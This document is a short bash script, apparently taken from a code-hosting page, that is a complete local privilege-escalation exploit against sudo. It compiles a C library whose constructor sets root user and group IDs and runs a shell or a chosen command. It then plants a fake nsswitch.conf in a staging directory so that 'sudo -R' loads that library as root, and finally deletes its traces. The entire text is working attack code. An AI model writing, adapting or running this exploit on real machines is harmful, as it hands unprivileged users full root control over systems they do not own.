32 lines
607 B
Bash
32 lines
607 B
Bash
#!/usr/bin/env bash
|
|
STAGE=$(mktemp -d /tmp/XXXXXX)
|
|
cd ${STAGE?} || exit 1
|
|
|
|
if [ $# -eq 0 ]; then
|
|
CMD="/bin/bash"
|
|
else
|
|
CMD="$@"
|
|
fi
|
|
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')
|
|
|
|
cat >w.c <<EOF
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
__attribute__((constructor)) void woot(void) {
|
|
setreuid(0,0);
|
|
setregid(0,0);
|
|
chdir("/");
|
|
execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
|
|
}
|
|
EOF
|
|
|
|
mkdir -p xd/etc libnss_
|
|
echo "passwd: /w" >xd/etc/nsswitch.conf
|
|
cp /etc/group xd/etc/
|
|
|
|
gcc -shared -fPIC -Wl,-init,w -o libnss_/w.so.2 w.c
|
|
|
|
sudo -R xd /bin/true
|
|
rm -rf ${STAGE?}
|